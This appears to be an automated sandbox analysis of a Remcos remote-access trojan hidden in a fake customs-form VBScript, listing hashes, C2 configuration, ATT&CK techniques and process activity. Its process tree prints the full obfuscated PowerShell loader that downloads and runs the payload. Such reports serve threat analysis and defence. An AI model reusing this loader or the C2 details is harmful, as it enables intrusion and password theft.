remcos | c3d9a6a1290c8e33ca03a8ede1e154fc6a4b9f004b42194ff997569ed1f56518

Analysis

max time kernel
150s
max time network
148s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
10-10-2024 02:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Customs Export Approval Clearance Certification form.vbs
Size

19KB
MD5

47d399062d4aff0aaf4af530b2abe8a5
SHA1

2eb30689b62c98dfb081f39b8ea1a2fb4dc6a0c6
SHA256

600be75e7c1aee18fbbd83a402f6ae6717813daff6e610a9d45a46f9c856c382
SHA512

94882a06a23c92b12b4a33eb16d5000676bc7c3c71384def877b22a55201b1c019f6dc334589acec7ea6a2006b3fb1b1d83cc4438952cda74aac52e9226e7655
SSDEEP

384:245uPIaVI9kcnqPIsLXZljDSL5dcWyJeWdClNCwSZxNmgA0:WPIaVI9NqAwZdSLsbCHSLNj

Score

10^/10

remcos remotehost collection discovery rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

154.216.18.65:2404

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-UXHRJ7
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral1/memory/1708-36-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral1/memory/1792-35-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/1808-42-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral1/memory/1708-36-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral1/memory/1792-35-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 5 IoCs

flow	pid	Process
5	2140	powershell.exe
7	592	msiexec.exe
8	592	msiexec.exe
10	592	msiexec.exe
11	592	msiexec.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	msiexec.exe

Network Service Discovery 1 TTPs 2 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
2140	powershell.exe
2800	powershell.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
592	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2800	powershell.exe
592	msiexec.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 592 set thread context of 1792	592	msiexec.exe	38
PID 592 set thread context of 1708	592	msiexec.exe	39
PID 592 set thread context of 1808	592	msiexec.exe	40

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2140	powershell.exe
2800	powershell.exe
2800	powershell.exe
1792	msiexec.exe
1792	msiexec.exe

Suspicious behavior: MapViewOfSection 4 IoCs

pid	Process
2800	powershell.exe
592	msiexec.exe
592	msiexec.exe
592	msiexec.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2140	powershell.exe
Token: SeDebugPrivilege	2800	powershell.exe
Token: SeDebugPrivilege	1808	msiexec.exe

Suspicious use of WriteProcessMemory 35 IoCs

description	pid	Process	procid_target
PID 2572 wrote to memory of 2140	2572	WScript.exe	32
PID 2572 wrote to memory of 2140	2572	WScript.exe	32
PID 2572 wrote to memory of 2140	2572	WScript.exe	32
PID 2800 wrote to memory of 592	2800	powershell.exe	36
PID 2800 wrote to memory of 592	2800	powershell.exe	36
PID 2800 wrote to memory of 592	2800	powershell.exe	36
PID 2800 wrote to memory of 592	2800	powershell.exe	36
PID 2800 wrote to memory of 592	2800	powershell.exe	36
PID 2800 wrote to memory of 592	2800	powershell.exe	36
PID 2800 wrote to memory of 592	2800	powershell.exe	36
PID 2800 wrote to memory of 592	2800	powershell.exe	36
PID 592 wrote to memory of 1792	592	msiexec.exe	38
PID 592 wrote to memory of 1792	592	msiexec.exe	38
PID 592 wrote to memory of 1792	592	msiexec.exe	38
PID 592 wrote to memory of 1792	592	msiexec.exe	38
PID 592 wrote to memory of 1792	592	msiexec.exe	38
PID 592 wrote to memory of 1792	592	msiexec.exe	38
PID 592 wrote to memory of 1792	592	msiexec.exe	38
PID 592 wrote to memory of 1792	592	msiexec.exe	38
PID 592 wrote to memory of 1708	592	msiexec.exe	39
PID 592 wrote to memory of 1708	592	msiexec.exe	39
PID 592 wrote to memory of 1708	592	msiexec.exe	39
PID 592 wrote to memory of 1708	592	msiexec.exe	39
PID 592 wrote to memory of 1708	592	msiexec.exe	39
PID 592 wrote to memory of 1708	592	msiexec.exe	39
PID 592 wrote to memory of 1708	592	msiexec.exe	39
PID 592 wrote to memory of 1708	592	msiexec.exe	39
PID 592 wrote to memory of 1808	592	msiexec.exe	40
PID 592 wrote to memory of 1808	592	msiexec.exe	40
PID 592 wrote to memory of 1808	592	msiexec.exe	40
PID 592 wrote to memory of 1808	592	msiexec.exe	40
PID 592 wrote to memory of 1808	592	msiexec.exe	40
PID 592 wrote to memory of 1808	592	msiexec.exe	40
PID 592 wrote to memory of 1808	592	msiexec.exe	40
PID 592 wrote to memory of 1808	592	msiexec.exe	40

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Customs Export Approval Clearance Certification form.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2572
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#springwater Halvkuglers Unwrap Vallensbk #>;$Tlleapparater='Lsefejl124';<#Perscent Gardy stormcentret Arbejdsbier #>;$Futurumets=$acoelomatanterpel+$host.UI;If ($Futurumets) {$Camelie++;}function Pansres($Overrumple){$Kraprd=$Harpuneredes+$Overrumple.'Length'-$Camelie; for( $acoelomata=3;$acoelomata -lt $Kraprd;$acoelomata+=4){$Yowls='Benzidine';$Vuling+=$Overrumple[$acoelomata];$Eloxeringer='Grammatikkernes';}$Vuling;}function Tekstbehandlingsmodulet202($Matrixers166){ & ($Lignes) ($Matrixers166);}$Besttende63=Pansres 'AllM oioFr zF,risigls plBanaPoo/Rep5Ra.. ,t0Bri Gra(BesWEpii nmnB.ldMyroEpiw stsFor .oNmonTN t Tid1 El0C s.slo0For; A. DeWstai rinW e6stu4 eu;Lig s dxUnr6Fus4 al;Cal Pror U v st:L d1Man2Bec1Fea. Oa0tra)Mas UncGCo e Inc U kFilosca/Ana2 so0 cr1Unr0pre0Inf1Ve 0slg1Bad marFBi ibyrr goesepfse,osv.xsuk/swa1.pi2Lre1 .i. U.0B s ';$Bibiri=Pansres '.rouHers Lse I,R H -Lo aU,dG H.e IonopeTLi ';$fjolleriers=Pansres 'T ihpret rt sup an:Mun/ sp/BarlUnsn C.6P.ob ue9,se.datsPenhUndo.onp Bi/CinTstoHM.lQP roK aq veZUfrn EjE Vi/M tNAccaWhagA.al peRest D,.OvehAffhXerp sy ';$Legenden=Pansres ' sy>Bog ';$Lignes=Pansres 'KomI odeUltXste ';$Jodens='Theologian';$Antimetathetic='\Halliard.Hje';Tekstbehandlingsmodulet202 (Pansres 'Bic$Athg MeLH doErhBHveATunlsne:Unef .hOskarMoubD trGoduassgBegEMu RswaMOpsyNonn jadAmei ElG Vih ksEOp,dFeo=Ind$D,tETreNReav s,: R aatapGarp apDskyA umt T.A us+.az$AntaEnkNPreTEmpIKurmVi EAt ToriAOroTTagHTigescrT.mbIKnaCThi ');Tekstbehandlingsmodulet202 (Pansres 'Dir$likgUniLP,rO KibPriaNonl eg:ApabPegA UmRny.o M.N s iD rEge s Un=Br $.hif H,jE eOPenLsamlvineKurr urIsubEHogrTras .i.Myxssilp EtlId,IPunT ,a(In $ceylGane Lig UneWeeNProd beEP on .l)Hyp ');Tekstbehandlingsmodulet202 (Pansres 'E s[RevNMemekalTci .U osfare V r,nuvC iiuniCBruesjaPsamoOphi fNFyrTM lmChoAN nnV.pAAnaGFeleP er Pe] nm:Enh:JorsMare vocCi.UOplrLniiMenT,enyTo pAd R s o AltunroAf CBraoUdtLD,p Fo =Vam .a[ arnCf E MoTInt. rsso eChecLe U Nir spITigTseaYafspDelREleo VaTNinos,aCNedOP tlAbaT N YsylpAr.E pr] va:sla: iTEctlAu,sO e1Azo2Bet ');$fjolleriers=$Baronies[0];$sporadicalness=(Pansres ',er$la GVa,LAnaO.ribPl,aZoolRo : NrMoryA BrrlenTLyprMeseKmprA n1sil7L g=EdiNUdke A WNed-staO .sb uejforEWoocE ttTeg BessBleYMulsseltKvgEk,aMPen.BronUs eFewTA a. apwNode OvBP ecCirlGruiDomE epnranTFry ');Tekstbehandlingsmodulet202 ($sporadicalness);Tekstbehandlingsmodulet202 (Pansres ' O.$subMHymaBour itBlorwareModrGag1U h7 ge.AdrH Fse jeaAfkdForeAntr BosM s[Fer$InsBsmaiDvrbPreiHikrPasiL f]una=sch$ChiBPiee mosF rtE etVaseOvenWardF.reF.e6 Ch3sp. ');$Misguiding=Pansres 'E.r$GalMGasaForrH stA.rrAneeUmbr al1 ,e7Fo .fruDBieoForwPusnNellB aos,maUnwdBr.FBl,iVerl TieHy.(Edi$ stfTelj OcomarlCnel.nneMalrWesist estrr HvsGen,Blt$ProB yo rrEtht BesFimlP ib ReeDes) et ';$Bortslbe=$Forbrugermyndighed;Tekstbehandlingsmodulet202 (Pansres 'Kol$AntgNealsupOPooBreta.laL R.:Ba.O apEkedHotAarbtfdsEElershaist N lG sps egs .ui.hyd alE LkR T N yleQuasCat=Foe(C atDecE esgy,Tsub- .rpAn A VrT UmHs o De$BedBYngO JeRPotT.its koL Hob Noetre)Ama ');while (!$Opdateringssidernes) {Tekstbehandlingsmodulet202 (Pansres 'Dag$ ffgHallDyroovebinea PslPre:ugeRIndeUnwsG ntsansF naP.vlVold Oti.nissu.=Fej$miktsprrDe,uLn eRi ') ;Tekstbehandlingsmodulet202 $Misguiding;Tekstbehandlingsmodulet202 (Pansres 'GausHvitselAs.rrP mtRed-TamsPorlshoEPruEK opUni Arr4Ura ');Tekstbehandlingsmodulet202 (Pansres ' Br$Au GProlMisOB,yBDisAAlelDan: lao FopCytdRapABretAntEIstrsubINy nRolG.ows s.sscriRefdundeForRWasNAntezo,sAcr=Cub( KoT,efe M sArbTTra-Nigp AnAChotGr.H eb sa $strb oOKasRUdpT ,os hl .eBPhieKni)Lou ') ;Tekstbehandlingsmodulet202 (Pansres 'Br.$N mgOveLm so M B,ocA stLkon: spTDicHLy OResLsimO stIi t= ,t$ apGHutl A.O omBJouA,omLNit:Carv K.a klOpnuResT inAskisLiv+Mi +Cu %Pas$HekBDdtAImprTitOIninPitIRveEGods Re. gucLigO PsuA,mNsittFas ') ;$fjolleriers=$Baronies[$Tholoi];}$Disrealize=313164;$Misvisning=30273;Tekstbehandlingsmodulet202 (Pansres 'Jur$ cGOctLKdboUndBA saTenlKor:UneV inoTuncpanOCo dLanePurdGe No = pi CaGs uE .oTs i-Te,C R,oR rn at ,oe,eanPanTcy, e$ InB oso ivrh ltUn stypLOrdBAnsEEro ');Tekstbehandlingsmodulet202 (Pansres ' re$Invg Jal,eno evbHenaDrylsen: A,F ,elAm o D,dHakiTekl YedLevesterK,lnBogeDee Bel= Un L,[ Tes F yAmasCattR ce omm Pr.D mCBogo ipn av UneBagr TutAnt]Lud:Ktu: ndF prBrnoPorm A BDemaPiosPeresun6 s 4 xosTrvtD srTeristen KugBil(Unb$TalVeneo.omcRenoVerd Une,indCo )Off ');Tekstbehandlingsmodulet202 (Pansres 'Vig$ Idgf.rLPhyO afbRa A O Lsal:.ilOBraBNulJ L eOksC olTsteLDigesk s risGlanConEGrasBumsund I h=Kip Cin[D.ksF.eYBugsMedTTidEUnomAn .C ot Breshrx BltPal.K kesi,nPunc oroUviDidyiMe.NVe.g Ma]Gie:Teg:Data M s VacsikiPaciFor.MytGFriE.nlTA esNontBr RA.tIsalNu.rG Fr(H.s$FjsfUnslDokoResdPraibroLsemDstuEFluR DonTa EDis)B s ');Tekstbehandlingsmodulet202 (Pansres 'Kaf$Rk,GAfvlHeno HeB uA Nol Br:Ca,T,anoWait haEMi M orDHjnys,urKomssk =F.u$EpiOPalbFisJEllEDahC UgTI vLAnseG,lsU dssanNGanE T,sParsBes.slys ,ruUn b.tys Klt ReRT riF oNR tggre(Ele$Livdstei,abssvir s EProaAnaLUnri CoZ D EFlu,To.$PluMUnsiB ns.isv InIGudsCo,NDusIsolnBo gUnu) sv ');Tekstbehandlingsmodulet202 $Totemdyrs;"
  2⤵
  - Blocklisted process makes network request
  - Network Service Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2140

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#springwater Halvkuglers Unwrap Vallensbk #>;$Tlleapparater='Lsefejl124';<#Perscent Gardy stormcentret Arbejdsbier #>;$Futurumets=$acoelomatanterpel+$host.UI;If ($Futurumets) {$Camelie++;}function Pansres($Overrumple){$Kraprd=$Harpuneredes+$Overrumple.'Length'-$Camelie; for( $acoelomata=3;$acoelomata -lt $Kraprd;$acoelomata+=4){$Yowls='Benzidine';$Vuling+=$Overrumple[$acoelomata];$Eloxeringer='Grammatikkernes';}$Vuling;}function Tekstbehandlingsmodulet202($Matrixers166){ & ($Lignes) ($Matrixers166);}$Besttende63=Pansres 'AllM oioFr zF,risigls plBanaPoo/Rep5Ra.. ,t0Bri Gra(BesWEpii nmnB.ldMyroEpiw stsFor .oNmonTN t Tid1 El0C s.slo0For; A. DeWstai rinW e6stu4 eu;Lig s dxUnr6Fus4 al;Cal Pror U v st:L d1Man2Bec1Fea. Oa0tra)Mas UncGCo e Inc U kFilosca/Ana2 so0 cr1Unr0pre0Inf1Ve 0slg1Bad marFBi ibyrr goesepfse,osv.xsuk/swa1.pi2Lre1 .i. U.0B s ';$Bibiri=Pansres '.rouHers Lse I,R H -Lo aU,dG H.e IonopeTLi ';$fjolleriers=Pansres 'T ihpret rt sup an:Mun/ sp/BarlUnsn C.6P.ob ue9,se.datsPenhUndo.onp Bi/CinTstoHM.lQP roK aq veZUfrn EjE Vi/M tNAccaWhagA.al peRest D,.OvehAffhXerp sy ';$Legenden=Pansres ' sy>Bog ';$Lignes=Pansres 'KomI odeUltXste ';$Jodens='Theologian';$Antimetathetic='\Halliard.Hje';Tekstbehandlingsmodulet202 (Pansres 'Bic$Athg MeLH doErhBHveATunlsne:Unef .hOskarMoubD trGoduassgBegEMu RswaMOpsyNonn jadAmei ElG Vih ksEOp,dFeo=Ind$D,tETreNReav s,: R aatapGarp apDskyA umt T.A us+.az$AntaEnkNPreTEmpIKurmVi EAt ToriAOroTTagHTigescrT.mbIKnaCThi ');Tekstbehandlingsmodulet202 (Pansres 'Dir$likgUniLP,rO KibPriaNonl eg:ApabPegA UmRny.o M.N s iD rEge s Un=Br $.hif H,jE eOPenLsamlvineKurr urIsubEHogrTras .i.Myxssilp EtlId,IPunT ,a(In $ceylGane Lig UneWeeNProd beEP on .l)Hyp ');Tekstbehandlingsmodulet202 (Pansres 'E s[RevNMemekalTci .U osfare V r,nuvC iiuniCBruesjaPsamoOphi fNFyrTM lmChoAN nnV.pAAnaGFeleP er Pe] nm:Enh:JorsMare vocCi.UOplrLniiMenT,enyTo pAd R s o AltunroAf CBraoUdtLD,p Fo =Vam .a[ arnCf E MoTInt. rsso eChecLe U Nir spITigTseaYafspDelREleo VaTNinos,aCNedOP tlAbaT N YsylpAr.E pr] va:sla: iTEctlAu,sO e1Azo2Bet ');$fjolleriers=$Baronies[0];$sporadicalness=(Pansres ',er$la GVa,LAnaO.ribPl,aZoolRo : NrMoryA BrrlenTLyprMeseKmprA n1sil7L g=EdiNUdke A WNed-staO .sb uejforEWoocE ttTeg BessBleYMulsseltKvgEk,aMPen.BronUs eFewTA a. apwNode OvBP ecCirlGruiDomE epnranTFry ');Tekstbehandlingsmodulet202 ($sporadicalness);Tekstbehandlingsmodulet202 (Pansres ' O.$subMHymaBour itBlorwareModrGag1U h7 ge.AdrH Fse jeaAfkdForeAntr BosM s[Fer$InsBsmaiDvrbPreiHikrPasiL f]una=sch$ChiBPiee mosF rtE etVaseOvenWardF.reF.e6 Ch3sp. ');$Misguiding=Pansres 'E.r$GalMGasaForrH stA.rrAneeUmbr al1 ,e7Fo .fruDBieoForwPusnNellB aos,maUnwdBr.FBl,iVerl TieHy.(Edi$ stfTelj OcomarlCnel.nneMalrWesist estrr HvsGen,Blt$ProB yo rrEtht BesFimlP ib ReeDes) et ';$Bortslbe=$Forbrugermyndighed;Tekstbehandlingsmodulet202 (Pansres 'Kol$AntgNealsupOPooBreta.laL R.:Ba.O apEkedHotAarbtfdsEElershaist N lG sps egs .ui.hyd alE LkR T N yleQuasCat=Foe(C atDecE esgy,Tsub- .rpAn A VrT UmHs o De$BedBYngO JeRPotT.its koL Hob Noetre)Ama ');while (!$Opdateringssidernes) {Tekstbehandlingsmodulet202 (Pansres 'Dag$ ffgHallDyroovebinea PslPre:ugeRIndeUnwsG ntsansF naP.vlVold Oti.nissu.=Fej$miktsprrDe,uLn eRi ') ;Tekstbehandlingsmodulet202 $Misguiding;Tekstbehandlingsmodulet202 (Pansres 'GausHvitselAs.rrP mtRed-TamsPorlshoEPruEK opUni Arr4Ura ');Tekstbehandlingsmodulet202 (Pansres ' Br$Au GProlMisOB,yBDisAAlelDan: lao FopCytdRapABretAntEIstrsubINy nRolG.ows s.sscriRefdundeForRWasNAntezo,sAcr=Cub( KoT,efe M sArbTTra-Nigp AnAChotGr.H eb sa $strb oOKasRUdpT ,os hl .eBPhieKni)Lou ') ;Tekstbehandlingsmodulet202 (Pansres 'Br.$N mgOveLm so M B,ocA stLkon: spTDicHLy OResLsimO stIi t= ,t$ apGHutl A.O omBJouA,omLNit:Carv K.a klOpnuResT inAskisLiv+Mi +Cu %Pas$HekBDdtAImprTitOIninPitIRveEGods Re. gucLigO PsuA,mNsittFas ') ;$fjolleriers=$Baronies[$Tholoi];}$Disrealize=313164;$Misvisning=30273;Tekstbehandlingsmodulet202 (Pansres 'Jur$ cGOctLKdboUndBA saTenlKor:UneV inoTuncpanOCo dLanePurdGe No = pi CaGs uE .oTs i-Te,C R,oR rn at ,oe,eanPanTcy, e$ InB oso ivrh ltUn stypLOrdBAnsEEro ');Tekstbehandlingsmodulet202 (Pansres ' re$Invg Jal,eno evbHenaDrylsen: A,F ,elAm o D,dHakiTekl YedLevesterK,lnBogeDee Bel= Un L,[ Tes F yAmasCattR ce omm Pr.D mCBogo ipn av UneBagr TutAnt]Lud:Ktu: ndF prBrnoPorm A BDemaPiosPeresun6 s 4 xosTrvtD srTeristen KugBil(Unb$TalVeneo.omcRenoVerd Une,indCo )Off ');Tekstbehandlingsmodulet202 (Pansres 'Vig$ Idgf.rLPhyO afbRa A O Lsal:.ilOBraBNulJ L eOksC olTsteLDigesk s risGlanConEGrasBumsund I h=Kip Cin[D.ksF.eYBugsMedTTidEUnomAn .C ot Breshrx BltPal.K kesi,nPunc oroUviDidyiMe.NVe.g Ma]Gie:Teg:Data M s VacsikiPaciFor.MytGFriE.nlTA esNontBr RA.tIsalNu.rG Fr(H.s$FjsfUnslDokoResdPraibroLsemDstuEFluR DonTa EDis)B s ');Tekstbehandlingsmodulet202 (Pansres 'Kaf$Rk,GAfvlHeno HeB uA Nol Br:Ca,T,anoWait haEMi M orDHjnys,urKomssk =F.u$EpiOPalbFisJEllEDahC UgTI vLAnseG,lsU dssanNGanE T,sParsBes.slys ,ruUn b.tys Klt ReRT riF oNR tggre(Ele$Livdstei,abssvir s EProaAnaLUnri CoZ D EFlu,To.$PluMUnsiB ns.isv InIGudsCo,NDusIsolnBo gUnu) sv ');Tekstbehandlingsmodulet202 $Totemdyrs;"
1⤵
- Network Service Discovery
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2800
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:592
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\bgsympxtzxyzqaupf"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:1792
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\mifrfhivnfietgqbodnp"
    3⤵
    - Accesses Microsoft Outlook accounts
    - System Location Discovery: System Language Discovery
    PID:1708
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\wckjgstoboardueffoaqdpw"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:1808

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Network Service Discovery

T1046

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\bgsympxtzxyzqaupf

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Roaming\Halliard.Hje

Filesize
447KB

MD5
2a5bd31d88dc1c37bf0f69f2c7337c2a

SHA1
71edf29a2eea9d451194ebd96b39709bab33958c

SHA256
dff64549793f580039494f8f85268c16b797575d467216c8f4e0e69248847754

SHA512
824d843d1b92bd4c9a6a19ecd438efc52a0123f52904257d17debadea6ffc5414e8008bfe019f491cb74f4697530dec43d16ceb14557a144086afba6a8cfad20

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BZTII1YD9BEZ82GZJPEC.temp

Filesize
7KB

MD5
cf3115e30338fa8cca7b28279d93b762

SHA1
256f17ad185d0b0cb0ed50a48db209b7fb079f2c

SHA256
d2874afc68e5999080e5cdd7a9ba427d332be7d5e0191fcd91667eb09496051e

SHA512
cec17143a05dc0adf7abf1a72a6aaea706781d8601acc656d89a4334eb134a3a298d4b80fc371883cc94b43b8235a77d9b7534903aa34a1e1c7ec9ca18bfc27d

Download Submit
memory/592-55-0x0000000000E10000-0x0000000001E72000-memory.dmp

Filesize
16.4MB

Download
memory/592-57-0x0000000000E10000-0x0000000001E72000-memory.dmp

Filesize
16.4MB

Download
memory/592-65-0x0000000000E10000-0x0000000001E72000-memory.dmp

Filesize
16.4MB

Download
memory/592-64-0x0000000000E10000-0x0000000001E72000-memory.dmp

Filesize
16.4MB

Download
memory/592-63-0x0000000000E10000-0x0000000001E72000-memory.dmp

Filesize
16.4MB

Download
memory/592-62-0x0000000000E10000-0x0000000001E72000-memory.dmp

Filesize
16.4MB

Download
memory/592-61-0x0000000000E10000-0x0000000001E72000-memory.dmp

Filesize
16.4MB

Download
memory/592-60-0x0000000000E10000-0x0000000001E72000-memory.dmp

Filesize
16.4MB

Download
memory/592-59-0x0000000000E10000-0x0000000001E72000-memory.dmp

Filesize
16.4MB

Download
memory/592-58-0x0000000000E10000-0x0000000001E72000-memory.dmp

Filesize
16.4MB

Download
memory/592-21-0x0000000000E10000-0x0000000001E72000-memory.dmp

Filesize
16.4MB

Download
memory/592-48-0x0000000000E10000-0x0000000001E72000-memory.dmp

Filesize
16.4MB

Download
memory/592-56-0x0000000000E10000-0x0000000001E72000-memory.dmp

Filesize
16.4MB

Download
memory/592-49-0x0000000000DD0000-0x0000000000DE9000-memory.dmp

Filesize
100KB

Download
memory/592-54-0x0000000000E10000-0x0000000001E72000-memory.dmp

Filesize
16.4MB

Download
memory/592-52-0x0000000000DD0000-0x0000000000DE9000-memory.dmp

Filesize
100KB

Download
memory/592-53-0x0000000000DD0000-0x0000000000DE9000-memory.dmp

Filesize
100KB

Download
memory/1708-36-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1708-34-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1708-32-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1708-29-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1792-25-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/1792-26-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1792-31-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1792-35-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1792-27-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1808-42-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1808-41-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1808-39-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1808-38-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2140-4-0x000007FEF5D8E000-0x000007FEF5D8F000-memory.dmp

Filesize
4KB

Download
memory/2140-13-0x000007FEF5D8E000-0x000007FEF5D8F000-memory.dmp

Filesize
4KB

Download
memory/2140-8-0x000007FEF5AD0000-0x000007FEF646D000-memory.dmp

Filesize
9.6MB

Download
memory/2140-7-0x000007FEF5AD0000-0x000007FEF646D000-memory.dmp

Filesize
9.6MB

Download
memory/2140-10-0x000007FEF5AD0000-0x000007FEF646D000-memory.dmp

Filesize
9.6MB

Download
memory/2140-15-0x000007FEF5AD0000-0x000007FEF646D000-memory.dmp

Filesize
9.6MB

Download
memory/2140-5-0x000000001B6B0000-0x000000001B992000-memory.dmp

Filesize
2.9MB

Download
memory/2140-11-0x000007FEF5AD0000-0x000007FEF646D000-memory.dmp

Filesize
9.6MB

Download
memory/2140-6-0x0000000002290000-0x0000000002298000-memory.dmp

Filesize
32KB

Download
memory/2140-9-0x000007FEF5AD0000-0x000007FEF646D000-memory.dmp

Filesize
9.6MB

Download
memory/2800-19-0x0000000006700000-0x00000000076E4000-memory.dmp

Filesize
15.9MB

Download